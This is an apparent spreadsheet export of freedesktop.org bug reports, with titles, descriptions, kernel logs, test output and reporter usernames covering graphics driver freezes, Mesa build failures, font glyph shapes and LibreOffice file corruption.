    <t>[GM45] Xorg freezes when using gnome shell: kernel BUG at drivers/gpu/drm/drm_irq.c:929!</t>
  </si>
  <si>
    <t>Created attachment 71081
dmesg
When I compile xf86-video-intel with sna and using gnome shell it sometimes freezes the whole Xserver. This happens approx once a day of normal usage and so far I haven't found a reliable way to reproduce (just move windows between workspaces a lot maybe with opengl apps it may freeze faster but not sure). I can't do anything even switching to console doesn't work however I can still ssh in. All my attempts to obtain a backtrace through ssh were unsuccessful. When i try to attach to X with gdb it just freezes the same happens when I'm already attached to it at the moment of incident. There is some interesting info in the dmesg. Also attaching Xorg log. (Logs are few days old however the incident just happened toady with bleeding edge stack).
BTW I was using UXA with no problems for a week. SNA lasts at most for 2 days.
GPU: GM45
Kernel: 3.6.8-2.fc17.x86_64
xf86-video-intel: 626dd1324dd2c5b14ca4aff598b5eb1e45550e69
mesa: cff4c94
libdrm: 171666e4b8127c17c68ea0d44cf4e81ec342f2d0
X.org: 1.12.4</t>
  </si>
  <si>
    <t>DEJAVU-7702</t>
  </si>
  <si>
    <t>Shape of U+416 U+41a U+42f U+436 U+43a U+44f</t>
  </si>
  <si>
    <t>In Cyrillic tradional typography the shape of U+416 (capital zhe) U+436 
(small zhe) is strongly related with U+436 (capital ka) U+43a (small ka): zhe 
consists of two ka letters. The capital and small letters are similar. Left 
tail of ya (U+42f U+44f) letter is sometimes correlated with ka. At now 
DejaVu fonts have mess with the shapes of this letters. There may be several 
shapes:
1. Strait lines like Latin k of Serif font without ascender.
2. Curly lines. Look for example at MS Arial font.
3. Sometimes modern fonts have glyphs similar Latin K or Cyrillic zhe of 
Serif font. 
The first and second items can be mixed (one tail being strait another being 
curly). The third varint is untraditional due to bad readability of 
Cyrillic zhe letters. The future shape of the letters should be dicussed. I 
prefer the first variant.</t>
  </si>
  <si>
    <t>MESA-30007</t>
  </si>
  <si>
    <t>[r300g] kwin thumbnails broken</t>
  </si>
  <si>
    <t>I updated mesa from git and the blur effect in kwin does not work anymore.
I'm on gentoo linux using gallium on an ATI radeon mobility X700 with the gallium r300g driver.
The effect used to work unfortunately I cannot tell which commit was fine with it.
Now instead than the blurred region I get a black area behind the transparency.</t>
  </si>
  <si>
    <t>marsicanbear</t>
  </si>
  <si>
    <t>DBUS-94244</t>
  </si>
  <si>
    <t>[PATCH] dbus-test-tool echo: fix sleep documentation</t>
  </si>
  <si>
    <t>Created attachment 121875
[PATCH] dbus-test-tool echo: fix sleep documentation</t>
  </si>
  <si>
    <t>johnnyspoon</t>
  </si>
  <si>
    <t>LIBREOFFICE-76979</t>
  </si>
  <si>
    <t>FILESAVE: Files are getting corrupted due to srgbClr value changes to auto</t>
  </si>
  <si>
    <t>Created attachment 96822
Original file
Steps to reproduce:
1. Open file in LibreOffice
2. Save As (Microsoft word 2007/2010(.docx))
3. Open the round trip file in MS OFFICE.
Expected Result:
The file should open properly after round trip.
Actual Result:
It gives a message The file cannot be opened because there are problems with the contents.</t>
  </si>
  <si>
    <t>POPPLER-26034</t>
  </si>
  <si>
    <t>Page transition Uncover and Fade not processed correctly.</t>
  </si>
  <si>
    <t>In source file: poppler/PageTransition.cc transition type Uncover and Fade not processed correctly they are reported as Push and Cover. So if a PDF page with Uncover or Fade transition effect will not be shown in correct transition effect.</t>
  </si>
  <si>
    <t>morpheslee</t>
  </si>
  <si>
    <t>DRI-76983</t>
  </si>
  <si>
    <t>[i915gml] *ERROR* conflict detected with stolen region: [0x1f8 00000 - 0x20000000]</t>
  </si>
  <si>
    <t>Using Asus Eee PC 701 4G with
    $ lspci | grep VGA
    00:02.0 VGA compatible controller: Intel Corporation Mobile 915GM/GMS/910GML Express Graphics Controller (rev 04)
and Debian Sid/unstable with Linux 3.13.7 the following message is printed by the Linux kernel during boot up.
    [â€¦]
    [    8.544621] [drm] Initialized drm 1.1.0 20060810
    [    8.572654] ACPI: AC Adapter [AC0] (on-line)
    [    8.573877] ACPI: Video Device [VGA] (multi-head: yes  rom: no  post: no)
    [    8.574323] input: Video Bus as /devices/LNXSYSTM:00/device:00/PNP0A08:00/LNXVIDEO:00/input/in
put6
    [    8.622351] ACPI: Battery Slot [BAT0] (battery absent)
    [    8.802352] [drm] Memory usable by graphics device = 256M
    [    8.802964] [drm] Supports vblank timestamp caching Rev 2 (21.10.2013).
    [    8.802971] [drm] Driver supports precise vblank timestamp query.
    [    8.824166] [drm:i915_stolen_to_physical] *ERROR* conflict detected with stolen region: [0x1f8
00000 - 0x20000000]
    [    8.824361] vgaarb: device changed decodes: PCI:0000:00:02.0olddecodes=io+memdecodes=io+mem:
owns=io+mem
    [    8.859502] [drm] initialized overlay support
    [    8.860146] usb 5-8: new high-speed USB device number 3 using ehci-pci
    [    8.946808] intel_rng: FWH not detected
    [    9.079470] input: Asus EeePC extra buttons as /devices/platform/eeepc/input/input7
    [    9.080213] i915 0000:00:02.0: BAR 6: [??? 0x00000000 flags 0x2] has bogus alignment
    [    9.080238] pci 0000:00:1f.0: BAR 13: [io  0x0800-0x087f] has bogus alignment
    [    9.080254] pci 0000:00:1e.0: PCI bridge to [bus 05]
    [    9.080296] agpgart-intel 0000:00:00.0: no hotplug settings from platform
    [    9.080305] agpgart-intel 0000:00:00.0: using default PCI settings
    [    9.080324] i915 0000:00:02.0: no hotplug settings from platform
    [â€¦]
No additional errors are observed though so no idea how serious this is. Having the Linux kernel print an `ERROR` message though looks scary to the user. -)</t>
  </si>
  <si>
    <t>paulepanter</t>
  </si>
  <si>
    <t>DRI-94703</t>
  </si>
  <si>
    <t>[BSW] igt / kms_universal_plane / disable-primary-vs-flip-pipe-c</t>
  </si>
  <si>
    <t>Created attachment 122563
BSW_disable-primary-vs-flip-pipe-C_kern.log
Hardware: 
Motherboard: Aspire XC-704 
cpu model name : Intel(R) Pentium(R) CPU N3700 @ 1.60GHz 
cpu model : 76 
cpu family : 6 
Graphic card: Device 22b1 (rev 21)
Software:
Bios: R01-A2
kernel nightly 4.5 10e913a  from https://cgit.freedesktop.org/cgit/?url=drm-intel/
  commit 10e913a48ca36790da9b58bed8729598ea79ebdb
  Author: Imre Deak 
  Date:   Thu Mar 17 15:23:17 2016 +0200
  drm-intel-nightly: 2016y-03m-17d-13h-22m-41s UTC integration manifest
cairo 1.15.2 db8a7f1 from git://anongit.freedesktop.org/cairo
libdrm-2.4.67-7 49041c3 from git://anongit.freedesktop.org/mesa/drm
IGT 1.14 8f6ed9e from http://anongit.freedesktop.org/git/xorg/app/intel-gpu-tools.git
Steps:
------
1. Execute IGT test: 
kms_universal_plane@disable-primary-vs-flip-pipe-c
Actual result:
--------------
1. Test is Pass
Expected result:
----------------
1. Test is fail
Output:
--------
# ./kms_universal_plane --run-subtest disable-primary-vs-flip-pipe-C
IGT-Version: 1.14-NOT-GIT (x86_64) (Linux: 4.5.0-nightly+ x86_64)
(kms_universal_plane:2115) CRITICAL: Test assertion failure function pageflip_test_pipe file kms_universal_plane.c:501:
(kms_universal_plane:2115) CRITICAL: Failed assertion: drmModePageFlip(data-&gt;drm_fd output-&gt;config.crtc-&gt;crtc_id test.red_fb.fb_id 0 NULL) == -EBUSY
(kms_universal_plane:2115) CRITICAL: Last errno: 2 No such file or directory
Stack trace:
  #0 [__igt_fail_assert+0xf1]
  #1 [run_tests_for_pipe.constprop.2+0x1aa9]
  #2 [__real_main774+0xa1]
  #3 [main+0x29]
  #4 [__libc_start_main+0xf5]
  #5 [_start+0x29]
  #6 [+0x29]
Subtest disable-primary-vs-flip-pipe-C failed.
**** DEBUG ****
(kms_universal_plane:2115) DEBUG: Test requirement passed: !(pipe &gt;= data-&gt;display.n_pipes)
(kms_universal_plane:2115) igt-kms-DEBUG: display: HDMI-A-1: set_pipe(C)
(kms_universal_plane:2115) igt-kms-DEBUG: display: HDMI-A-1: set_pipe(C)
(kms_universal_plane:2115) igt-fb-DEBUG: igt_create_fb_with_bo_size(width=1920 height=1080 format=0x34325258 [bpp=32] tiling=0x0 size=0)
(kms_universal_plane:2115) igt-fb-DEBUG: igt_create_fb_with_bo_size(handle=1 pitch=7680)
(kms_universal_plane:2115) igt-fb-DEBUG: igt_create_fb_with_bo_size(width=1920 height=1080 format=0x34325258 [bpp=32] tiling=0x0 size=0)
(kms_universal_plane:2115) igt-fb-DEBUG: igt_create_fb_with_bo_size(handle=2 pitch=7680)
(kms_universal_plane:2115) igt-kms-DEBUG: display: C.0: plane_set_fb(83)
(kms_universal_plane:2115) igt-kms-DEBUG: display: commit {
(kms_universal_plane:2115) igt-kms-DEBUG: display: }
(kms_universal_plane:2115) igt-kms-DEBUG: display: C.0: plane_set_fb(0)
(kms_universal_plane:2115) igt-kms-DEBUG: display: commit {
(kms_universal_plane:2115) igt-kms-DEBUG: display: }
(kms_universal_plane:2115) CRITICAL: Test assertion failure function pageflip_test_pipe file kms_universal_plane.c:501:
(kms_universal_plane:2115) CRITICAL: Failed assertion: drmModePageFlip(data-&gt;drm_fd output-&gt;config.crtc-&gt;crtc_id test.red_fb.fb_id 0 NULL) == -EBUSY
(kms_universal_plane:2115) CRITICAL: Last errno: 2 No such file or directory
****  END  ****
Subtest disable-primary-vs-flip-pipe-C: FAIL (0.050s)</t>
  </si>
  <si>
    <t>DBUS-25119</t>
  </si>
  <si>
    <t>Leaks DBusGMethodInvocation if no_reply is set.</t>
  </si>
  <si>
    <t>I just noticed in passing that dbus_g_method_return and _error leak the DBusGMethodInvocation if no_reply was set on the method call.</t>
  </si>
  <si>
    <t>XORG-987</t>
  </si>
  <si>
    <t>XV viewport effect with multiple heads with different resolutions</t>
  </si>
  <si>
    <t>Hi 
Apologies if this is in the wrong category I couldn't find anything xv specific so I picked on the driver 
instead. 
I have a Dell Inspiron 5100 with on board ATI Mobility 7500 graphics.  Works great with the radeon 
driver using DRM but xv overlays won't expand to full screen when outputting to my external 
monitor at 1280x1024. 
It's very difficult to describe...the video -appears- to be stretching to the full screen but I get a kind of 
viewport effect where I get a box (I am guessing its 1024x768 in size roughly) and if I move the 
box around I can move the viewport and see parts of the movie that are hidden. 
If the movie isn't full screen and I have say xine at the top of the screen and I move the mouse to 
the bottom of the screen some of the video that's playing is hidden. 
If you can tell me how to do screenshots of overlayed stuff I'll show you what I mean...I hope I've 
described it properly. 
Laptop display panel runs at 1024x768 external output is set at 1280x1024.</t>
  </si>
  <si>
    <t>LIBREOFFICE-52144</t>
  </si>
  <si>
    <t>UI: [DE] Missing hyphens in about dialog</t>
  </si>
  <si>
    <t>In the new about dialog (Hilfe --&gt; Info Ã¼ber LibreOffice) the text is ... einfach zu nutzendes Open Source Programm fÃ¼r ....
According to German grammar rules ... einfach zu nutzendes Open-Source-Programm ... (with hyphens) would be nicer. It is not mandatory but a convention.
http://dokumentation.htu.tugraz.at/rechtschreibung/?dok=c (Â§ 45)
Version 3.6.0.1 (Build ID: 73f9fb6)</t>
  </si>
  <si>
    <t>fearthebear</t>
  </si>
  <si>
    <t>MESA-99236</t>
  </si>
  <si>
    <t>System (seems to) completely freeze when interacting with java swing applications.</t>
  </si>
  <si>
    <t>I'm not completely certain whether it's related to AMD GPU driver or not but it's rather strange issue that I can get stable reproduce for.
I'm running a Gentoo system with AMD Radeon RX 480 with git AMD GPU driver and git version of mesa. When interacting with scrollable JTextAreas in Java Swing application I get a stably reproducible issue (100%). Since this affects multiple java swing applications (e.g. eclipse) including the program I'm developing at the time I can attempt to put together a reproducer java app if that's needed.
For first 2-3 seconds mouse cursor moves jittery then it stops to move at all and display keeps displaying same frozen state. Nothing appears to work including Ctrl+Alt+F1 etc. But despite machine looking completely locked up in fact it's not. I can ssh into it and issue reboot command. During that time display doesn't shows any signs of life until the moment when machine reboots (but I can hear KDE shutdown sound).
This occurs only under JRE8 both icedtea and oracle variants. Under JRE7 issue doesn't trigger. If memory serves JRE8 brought improvements to hardware-accelerated GUI rendering. This is especially strange since Swing GUI framework renders it's own GUI widgets.
Considering that even Ctrl+Alt+F1 doesn't work I suppose problem happens on kernel level possibly in AMD GPU driver.</t>
  </si>
  <si>
    <t>tmp6154</t>
  </si>
  <si>
    <t>XORG-14684</t>
  </si>
  <si>
    <t>libXau ansify functions under #ifdef K5AUTH</t>
  </si>
  <si>
    <t>Created attachment 14586
0001-Ansify-2-remaining-K-R-prototype-functions.patch
Just for coherence as all remaining libXau code is
already ansified.</t>
  </si>
  <si>
    <t>TELEPATHY-14111</t>
  </si>
  <si>
    <t>Haze needs servers listed unneccessarily</t>
  </si>
  <si>
    <t>All haze protocols require a server to be added when an account is created a sensible default should probably be provided for those protocols where there is only one server.</t>
  </si>
  <si>
    <t>PIGLIT-55488</t>
  </si>
  <si>
    <t>Created attachment 67919
PGP public key
Real name: BlaÅ¾ TomaÅ¾iÄ
Email address: blaz.tomazic@gmail.com
Preferred account name: blazt</t>
  </si>
  <si>
    <t>blaz.tomazic</t>
  </si>
  <si>
    <t>CAIRO-7294</t>
  </si>
  <si>
    <t>cairo doesn't work with a BGR X server visual (assertion failure: Cairo does not yet support the requested image format)</t>
  </si>
  <si>
    <t>While I chose 1.1.9 at the version it was actually 1.1.10.
While I chose enhancement at the Severity most GTK2 linked
apps get aborted e.g.
$ sylpheed 
Error: Cairo does not yet support the requested image format:
        Depth: 32
        Alpha mask: 0x00000000
        Red   mask: 0x000000ff
        Blue  mask: 0x0000ff00
        Green mask: 0x00ff0000
Please file an enhacement request (quoting the above) at:
http://bugs.freedesktop.org/enter_bug.cgi?product=cairo
Assertion failed: EX file cairo-image-surface.c line 144
Abort (core dumped)</t>
  </si>
  <si>
    <t>daichi.k</t>
  </si>
  <si>
    <t>MESA-35612</t>
  </si>
  <si>
    <t>[llvmpipe] src/gallium/auxiliary/gallivm/lp_bld_debug.cpp:35:30: fatal error: llvm/System/Host.h: No such file or directory</t>
  </si>
  <si>
    <t>mesa: 81992010b57e5b137c9319b47f282e267a086582 (master)
llvm: llvm-3.0svn r128191
$ scons
[...]
  Compiling src/gallium/auxiliary/gallivm/lp_bld_debug.cpp ...
src/gallium/auxiliary/gallivm/lp_bld_debug.cpp:35:30: fatal error: llvm/System/Host.h: No such file or directory
In llvm-3.0svn the include file has been moved to llvm/Support/Host.h.</t>
  </si>
  <si>
    <t>DRI-101272</t>
  </si>
  <si>
    <t>[BAT][GLK] many tests giving *ERROR* Max supported pixel clock with scaling exceeded</t>
  </si>
  <si>
    <t>Created attachment 131640
dmesg during
On CI many tests started failing and giving dmesg fail/warnings on GLK.
[   32.541257] [drm:skl_check_pipe_max_pixel_rate [i915]] *ERROR* Max supported pixel clock with scaling exceeded
[   32.556863] [drm:skl_check_pipe_max_pixel_rate [i915]] *ERROR* Max supported pixel clock with scaling exceeded
Dmesg attached</t>
  </si>
  <si>
    <t>XORG-79204</t>
  </si>
  <si>
    <t>[NV50] No reported temperature/fan speed on GTX260</t>
  </si>
  <si>
    <t>Created attachment 99756
dmesg debug
Nouveau doesn't report any temperature nor fan speed when using GTX260 (Gigabyte N26-896H-B). 
Reporting this because of discussion in bug 78116 as I didn't notice the fan management chip (the ADT7473) in logs.</t>
  </si>
  <si>
    <t>mdop</t>
  </si>
  <si>
    <t>LIBREOFFICE-40250</t>
  </si>
  <si>
    <t>TABLE: Hidden section causes crash</t>
  </si>
  <si>
    <t>Follow-up of issue http://openoffice.org/bugzilla/show_bug.cgi?id=117395
Same crash for LibreOffice 3.4.3 rc1 and master under Ubuntu 10.04.
JBF</t>
  </si>
  <si>
    <t>MESA-87062</t>
  </si>
  <si>
    <t>[drm] Chrome GPU crash (Error Failed to reset chip: -19)</t>
  </si>
  <si>
    <t>Created attachment 110526
/sys/class/drm/card0/error
Using chrome with hardware acceleration enabled (regardless of window manager) the system will briefly hang on some pages (always happens going to the chrome webstore) and then promptly crash. The problem used to cause black screen but lately after some patching and upgrading to the promoted builds of kubuntu and mesa has resulted in the screen going black briefly and then recovered but with the window manager being hung and unresponsive until a clean boot.
The workaround is to disable hardware acceleration in chrome or avoid known sites that use webgl. Not all webgl seems to crash the system but I have managed with several cases such as having multiple webgl pages open (I suspect that it is a memory issue) or going to the chrome webstore (which could also be the memory issue).
Attached is the file the syslog mentions.
Syslog output:
 Dec  6 16:06:06 tyler-Vostro1510 kernel: [ 3302.804047] [drm] stuck on render ring
 Dec  6 16:06:06 tyler-Vostro1510 kernel: [ 3302.805052] [drm] GPU HANG: ecode 0:    0x9f47f9fd in chrome [4081] reason: Ring hung action: reset
 Dec  6 16:06:06 tyler-Vostro1510 kernel: [ 3302.805055] [drm] GPU hangs can         indicate a bug anywhere in the entire gfx stack including userspace.
 Dec  6 16:06:06 tyler-Vostro1510 kernel: [ 3302.805057] [drm] Please file a _new_   bug report on bugs.freedesktop.org against DRI -&gt; DRM/Intel
 Dec  6 16:06:06 tyler-Vostro1510 kernel: [ 3302.805058] [drm] drm/i915 developers   can then reassign to the right component if it's not a kernel issue.
 Dec  6 16:06:06 tyler-Vostro1510 kernel: [ 3302.805060] [drm] The gpu crash dump    is required to analyze gpu hangs so please always attach it.
 Dec  6 16:06:06 tyler-Vostro1510 kernel: [ 3302.805061] [drm] GPU crash dump saved  to /sys/class/drm/card0/error
 Dec  6 16:06:06 tyler-Vostro1510 kernel: [ 3302.805199] [drm:i915_reset] *ERROR*    Failed to reset chip: -19SRC=192.168.0.5 DST=224.0.0.1 LEN=44  TOS=0x00 PREC=0x00 TTL=1 ID=44119 PROTO=UDP SPT=62174 DPT=8612 LEN=24
 Dec  6 16:06:23 tyler-Vostro1510 kernel: [ 3319.784072] ------------[ cut here      ]------------
 Dec  6 16:06:23 tyler-Vostro1510 kernel: [ 3319.784126] WARNING: CPU: 1 PID: 1656   at /build/buildd/linux-3.16.0/drivers/gpu/drm/drm_irq.c:774 send_vblank_event+0xf9/ 0x110 [drm]()
 Dec  6 16:06:23 tyler-Vostro1510 kernel: [ 3319.784129] Modules linked in:          snd_hrtimer ctr ccm bnep rfcomm bluetooth 6lowpan_iphc ip6t_REJECT xt_hl ip6t_rt    nf_conntrack_ipv6 nf_defrag_ipv6 ipt_REJECT xt_comment xt_LOG xt_multiport          xt_limit xt_tcpudp xt_addrtype nf_conntrack_ipv4 nf_defrag_ipv4 xt_conntrack        uvcvideo videobuf2_vmalloc videobuf2_memops videobuf2_core v4l2_common videodev     media binfmt_misc arc4 ip6table_filter ip6_tables nf_conntrack_netbios_ns           nf_conntrack_broadcast nf_nat_ftp nf_nat nf_conntrack_ftp nf_conntrack              iptable_filter ip_tables x_tables snd_hda_codec_realtek parport_pc                  snd_hda_codec_generic ppdev dell_wmi sparse_keymap dell_laptop dcdbas coretemp      joydev serio_raw lpc_ich snd_hda_intel snd_hda_controller snd_hda_codec snd_hwdep   snd_pcm ndiswrapper(OE) snd_seq_midi tpm_infineon snd_seq_midi_event snd_rawmidi    snd_seq b43 bcma mac80211 shpchp snd_seq_device snd_timer snd cfg80211 soundcore    mac_hid ssb lp parport xts gf128mul dm_crypt psmouse firewire_ohci ahci libahci     i915 pata_acpi sdhci_pci sdhci firewire_core crc_itu_t i2c_algo_bit drm_kms_helper  r8169 drm mii wmi video
 Dec  6 16:06:23 tyler-Vostro1510 kernel: [ 3319.784204] CPU: 1 PID: 1656 Comm:      Xorg Tainted: P           OE 3.16.0-25-generic #33-Ubuntu
 Dec  6 16:06:23 tyler-Vostro1510 kernel: [ 3319.784207] Hardware name: Dell Inc.    Vostro1510/0M277C BIOS A15 03/18/2009
 Dec  6 16:06:23 tyler-Vostro1510 kernel: [ 3319.784209]  0000000000000009           ffff8800b7543c48 ffffffff8178015c 0000000000000000
 Dec  6 16:06:23 tyler-Vostro1510 kernel: [ 3319.784213]  ffff8800b7543c80           ffffffff8106fd7d ffff88006b625a20 ffff88009c71f300
 Dec  6 16:06:23 tyler-Vostro1510 kernel: [ 3319.784217]  ffff8800355a0000           ffff880035621018 ffff88003549c000 ffff8800b7543c90
 Dec  6 16:06:23 tyler-Vostro1510 kernel: [ 3319.784221] Call Trace:
 Dec  6 16:06:23 tyler-Vostro1510 kernel: [ 3319.784230]  []       dump_stack+0x45/0x56
 Dec  6 16:06:23 tyler-Vostro1510 kernel: [ 3319.784237]  []       warn_slowpath_common+0x7d/0xa0
 Dec  6 16:06:23 tyler-Vostro1510 kernel: [ 3319.784241]  []       warn_slowpath_null+0x1a/0x20
 Dec  6 16:06:23 tyler-Vostro1510 kernel: [ 3319.784254]  []       send_vblank_event+0xf9/0x110 [drm]
 Dec  6 16:06:23 tyler-Vostro1510 kernel: [ 3319.784268]  []       drm_send_vblank_event+0x80/0xc0 [drm]
 Dec  6 16:06:23 tyler-Vostro1510 kernel: [ 3319.784315]  []       intel_crtc_page_flip+0x1e5/0x500 [i915]
 Dec  6 16:06:23 tyler-Vostro1510 kernel: [ 3319.784335]  []       drm_mode_page_flip_ioctl+0x16c/0x320 [drm]
 Dec  6 16:06:23 tyler-Vostro1510 kernel: [ 3319.784347]  []       drm_ioctl+0x1df/0x680 [drm]
 Dec  6 16:06:23 tyler-Vostro1510 kernel: [ 3319.784356]  [] ?     do_readv_writev+0x16d/0x240
 Dec  6 16:06:23 tyler-Vostro1510 kernel: [ 3319.784360]  [] ?     __dentry_kill+0x17a/0x200
 Dec  6 16:06:23 tyler-Vostro1510 kernel: [ 3319.784366]  [] ?     mntput+0x24/0x40
 Dec  6 16:06:23 tyler-Vostro1510 kernel: [ 3319.784370]  []       do_vfs_ioctl+0x2c8/0x4a0
 Dec  6 16:06:23 tyler-Vostro1510 kernel: [ 3319.784373]  [] ?     ____fput+0xe/0x10
 Dec  6 16:06:23 tyler-Vostro1510 kernel: [ 3319.784377]  []       SyS_ioctl+0x81/0xa0
 Dec  6 16:06:23 tyler-Vostro1510 kernel: [ 3319.784382]  []       system_call_fastpath+0x1a/0x1f
 Dec  6 16:06:23 tyler-Vostro1510 kernel: [ 3319.784384] ---[ end trace              5f70e779f92b6f42 ]---</t>
  </si>
  <si>
    <t>tyduptyler13</t>
  </si>
  <si>
    <t>MESA-29661</t>
  </si>
  <si>
    <t>MSVC built u_format_test fails on Windows</t>
  </si>
  <si>
    <t>mesa: f5703a54e2f765237e01eef6ddbd019ca6a58e81 (master)
Run u_format_test on Windows.
Testing util_format_r32_sscaled_pack_rgba_float ...
FAILED: 00 00 00 80 obtained
        00 00 00 00 expected
FAILED: 00 00 00 80 obtained
        00 00 00 01 expected
FAILED: 00 00 00 80 obtained
        00 00 00 ff expected
Testing util_format_r32g32_sscaled_pack_rgba_float ...
FAILED: 00 00 00 80 00 00 00 80 obtained
        00 00 00 00 00 00 00 00 expected
FAILED: 00 00 00 80 00 00 00 80 obtained
        00 00 00 01 00 00 00 00 expected
FAILED: 00 00 00 80 00 00 00 80 obtained
        00 00 00 ff 00 00 00 00 expected
FAILED: 00 00 00 80 00 00 00 80 obtained
        00 00 00 00 00 00 00 01 expected
FAILED: 00 00 00 80 00 00 00 80 obtained
        00 00 00 00 00 00 00 ff expected
Testing util_format_r32g32b32_sscaled_pack_rgba_float ...
FAILED: 00 00 00 80 00 00 00 80 00 00 00 80 obtained
        00 00 00 00 00 00 00 00 00 00 00 00 expected
FAILED: 00 00 00 80 00 00 00 80 00 00 00 80 obtained
        00 00 00 01 00 00 00 00 00 00 00 00 expected
FAILED: 00 00 00 80 00 00 00 80 00 00 00 80 obtained
        00 00 00 ff 00 00 00 00 00 00 00 00 expected
FAILED: 00 00 00 80 00 00 00 80 00 00 00 80 obtained
        00 00 00 00 00 00 00 01 00 00 00 00 expected
FAILED: 00 00 00 80 00 00 00 80 00 00 00 80 obtained
        00 00 00 00 00 00 00 ff 00 00 00 00 expected
FAILED: 00 00 00 80 00 00 00 80 00 00 00 80 obtained
        00 00 00 00 00 00 00 00 00 00 00 01 expected
FAILED: 00 00 00 80 00 00 00 80 00 00 00 80 obtained
        00 00 00 00 00 00 00 00 00 00 00 ff expected
Testing util_format_r32g32b32a32_sscaled_pack_rgba_float ...
FAILED: 00 00 00 80 00 00 00 80 00 00 00 80 00 00 00 80 obtained
        00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 expected
FAILED: 00 00 00 80 00 00 00 80 00 00 00 80 00 00 00 80 obtained
        00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 expected
FAILED: 00 00 00 80 00 00 00 80 00 00 00 80 00 00 00 80 obtained
        00 00 00 ff 00 00 00 00 00 00 00 00 00 00 00 00 expected
FAILED: 00 00 00 80 00 00 00 80 00 00 00 80 00 00 00 80 obtained
        00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 expected
FAILED: 00 00 00 80 00 00 00 80 00 00 00 80 00 00 00 80 obtained
        00 00 00 00 00 00 00 ff 00 00 00 00 00 00 00 00 expected
FAILED: 00 00 00 80 00 00 00 80 00 00 00 80 00 00 00 80 obtained
        00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 expected
FAILED: 00 00 00 80 00 00 00 80 00 00 00 80 00 00 00 80 obtained
        00 00 00 00 00 00 00 00 00 00 00 ff 00 00 00 00 expected
FAILED: 00 00 00 80 00 00 00 80 00 00 00 80 00 00 00 80 obtained
        00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 expected
FAILED: 00 00 00 80 00 00 00 80 00 00 00 80 00 00 00 80 obtained
        00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff expected</t>
  </si>
  <si>
    <t>POPPLER-26442</t>
  </si>
  <si>
    <t>[cmake] poppler-0.12.3 fails to compile glib component when gtk was found</t>
  </si>
  <si>
    <t>Created attachment 33091
darwin gtk link fix
Using the Cmake way to build.
The full error is multiple pages long but this gives the idea:
Linking CXX shared library libpoppler-glib.dylib
ld warning: duplicate dylib /Library/Gentoo/lib/libz.dylib
Undefined symbols:
  _g_type_class_add_private referenced from:
      poppler_attachment_class_init(_PopplerAttachmentClass*)       in poppler-attachment.cc.o
  _g_value_set_flags referenced from:
      poppler_document_get_property(_GObject* unsigned int _GValue* _GParamSpec*)in poppler-document.cc.o
      poppler_document_get_property(_GObject* unsigned int _GValue* _GParamSpec*)in poppler-document.cc.o
  _g_type_check_instance_is_a referenced from:
      _poppler_ps_file_new in poppler-document.cc.o
      _poppler_document_has_attachments in poppler-document.cc.o
      _poppler_document_get_n_pages in poppler-document.cc.o
      _poppler_font_info_new in poppler-document.cc.o
The _g_XXX symbols come from gtk which libraries are not given to the linker when GTK is found.  I will attach a patch which fixes this for me.</t>
  </si>
  <si>
    <t>grobian</t>
  </si>
  <si>
    <t>MESA-92770</t>
  </si>
  <si>
    <t>[SNB regression dEQP] deqp-gles3.functional.shaders.discard.dynamic_loop_texture</t>
  </si>
  <si>
    <t>This dEQP test fails at the following commit:
Author:     Connor Abbott 
AuthorDate: Sat Jun 6 13:32:21 2015 -0400
Commit:     Connor Abbott 
CommitDate: Fri Oct 30 02:19:00 2015 -0400
    i965: always run the post-RA scheduler
    Before we would only do scheduling after register allocation if we
    spilled despite the fact that the pre-RA scheduler was only supposed to
    be for register pressure and set the latencies of every instruction to
    1. This meant that unless we spilled which we rarely do then we never
    considered instruction latencies at all and we usually never bothered
    to try and hide texture fetch latency. Although a later commit removes
    the setting the latency to 1 part we still want to always run the
    post-RA scheduler since it's able to take the false dependencies that
    the register allocator creates into account and it can be more
    aggressive than the pre-RA scheduler since it doesn't have to worry
    about register pressure at all.
    Test                   master      post-ra-sched     diff       %diff
    bench_OglPSBump2       396.730     402.386           5.656      +1.400%
    bench_OglPSBump8       244.370     247.591           3.221      +1.300%
    bench_OglPSPhong       241.117     242.002           0.885      +0.300%
    bench_OglPSPom         59.555      59.725            0.170      +0.200%
    bench_OglShMapPcf      86.149      102.346           16.197     +18.800%
    bench_OglVSTangent     388.849     395.489           6.640      +1.700%
    bench_trex             65.471      65.862            0.390      +0.500%
    bench_trexoff          69.562      70.150            0.588      +0.800%
    bench_heaven           25.179      25.254            0.074      +0.200%
    Reviewed-by: Jason Ekstrand 
Sample test output:
Standard Output
/tmp/build_root/m64/opt/deqp/modules/gles3/deqp-gles3 --deqp-case=dEQP-GLES3.functional.shaders.discard.dynamic_loop_texture --deqp-surface-type=fbo --deqp-log-images=disable --deqp-surface-width=256 --deqp-surface-height=256
dEQP Core 2014.x (0xcafebabe) starting..
  target implementation = 'DRM'
Test case 'dEQP-GLES3.functional.shaders.discard.dynamic_loop_texture'..
Vertex shader compile time = 5.244000 ms
Fragment shader compile time = 0.635000 ms
Link time = 5.734000 ms
Test case duration in microseconds = 254539 us
  Fail (Fail)
DONE!
Test run totals:
  Passed:        0/1 (0.0%)
  Failed:        1/1 (100.0%)
  Not supported: 0/1 (0.0%)
  Warnings:      0/1 (0.0%)</t>
  </si>
  <si>
    <t>XORG-16439</t>
  </si>
  <si>
    <t>Vesa driver makes screen black on Fedora 9 xorg with via chrome9 HC IGP chip</t>
  </si>
  <si>
    <t>When I go to start X on Fedora 9 (and rawhide) with the vesa driver then my screen gets black and it freezes my machine (i.e. I am unable to kill X with alt+ctrl+del).  I have a Via Chrome9 HC IGP ordinarily I would use the openchrome driver but it doesn't work with Fedora 9's xorg either.  Fedora is running 1.4.99.  Vesa worked fine with Fedora 7 and Fedora 8 which used the older xorg.</t>
  </si>
  <si>
    <t>cddesjardins</t>
  </si>
  <si>
    <t>XORG-25633</t>
  </si>
  <si>
    <t>Intel Driver crash on i865G (with current karmic+xorg edgers PPA)</t>
  </si>
  <si>
    <t>Since 6.99.99 releases I had a few crashes in Intel latest driver.
Last crash occured with RC1 (2:2.9.99.901+git20091209.093bb9eb-0ubuntu0tormod2~karmic)
Backtrace:
0: /usr/bin/X(xorg_backtrace+0x3b) [0x8133dbb]
1: /usr/bin/X(xf86SigHandler+0x55) [0x80c1395]
2: /lib/tls/i686/cmov/libc.so.6 [0x2a5568]
3: /usr/lib/xorg/modules/drivers//intel_drv.so [0xcf9b74]
